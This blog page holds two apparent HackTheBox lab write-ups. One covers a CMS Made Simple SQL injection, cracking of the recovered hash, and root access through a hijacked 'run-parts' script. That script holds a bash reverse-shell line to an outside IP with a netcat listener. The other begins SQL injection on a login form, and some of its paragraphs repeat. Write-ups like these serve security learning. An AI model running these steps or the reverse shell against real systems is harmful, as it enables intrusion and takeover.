Here, you’ll find all the latest hacking news from around the world.

Showing posts with label NEWS. Show all posts
Showing posts with label NEWS. Show all posts

Wednesday, December 30, 2020

Hackthebox Writeup




User

As always, I started with an nmap scan which revealed two ports open, port 22 (SSH) and port 80 (HTTP).


Visiting port 80 showed a very simple page and nothing else. No links, nothing. Well, except for a warning that I’d be banned if I hit a lot of 404 pages, so no gobuster or similar brute forcing was going to work here.


Fortunately, checking robots.txt gave me something to work on, as it didn’t want me to visit /writeup. Which is exactly what I did!
There wasn’t much of interest in /writeup, but wappalyzer (a Firefox plugin) identified the software running as ‘CMS Made Simple’. Something which exploit-db has several exploits for.
I found an SQL injection exploit which didn’t need any valid credentials, and since I wasn’t able to identify the version of CMS Made Simple running, I decided to give it a try.
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
Within a short time the exploit had extracted a username, and the salt and hash for the password. Using hashcat with mode 20 (md5($salt.$pass)) I got the password ‘raykayjay9’ which allowed me to log in via SSH and grab the user flag.

root

For root, I did the usual and fetched LinEnum and pspy and ran them. I didn’t initially notice anything with these tools, so I ran pspy with the parameters -fp to see all file system events.
When someone ssh’d into the box, sshd would call run-parts without a specific path, looking in the following dirs in the PATH variable:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Checking if any of these directories were writable showed that both /usr/local/sbin and /usr/local/bin were. So what would happen if I were to put an executable script called ‘run-parts’ into either of the above dirs?
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.10/9001 0>&1
Running chmod +x to make the above script executable and starting a reverse netcat listener

nc -lvnp 9001
All I had to do was log in via SSH again, and I had a reverse root shell and could grab the root flag!

Share:

Tuesday, December 29, 2020

Magic Hackthebox

 



Welcome Readers, Today we will be doing the hack the box (HTB) challenge

Enumeration

Starting off with a little nmap, we see SSH and HTTP open.

root@kali:~/Documents/HackTheBox/Magic# nmap -Pn -sS -n -p1-10000 -T4 -sV 10.10.10.185 -vv
...
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
...
A quick check for OpenSSH v7.6p1 vulnerabilities doesn’t seem to give us anything, so let’s move on to port 80.
At first glance, there are just a bunch of images on the site - nothing too interesting. Of note in the source code, however, are references to images located in images/uploads. This will be useful later.



Next, in the bottom left corner there is a login button which will presumably let us upload images, so let’s try that.

Next, in the bottom left corner there is a login button which will presumably let us upload images, so let’s try that.

Foothold

Now, we are presented with a very simple login dialog box. The login process appears to be pretty standard in that it POSTs a username and password to the PHP backend.



Since we don’t know the username or password, let’s try SQL injection in both fields. The idea here is that the PHP code in the back may look something like this:

Since we don’t know the username or password, let’s try SQL injection in both fields. The idea here is that the PHP code in the back may look something like this:
...


Share:

Contact us

Name

Email *

Message *

Theme Support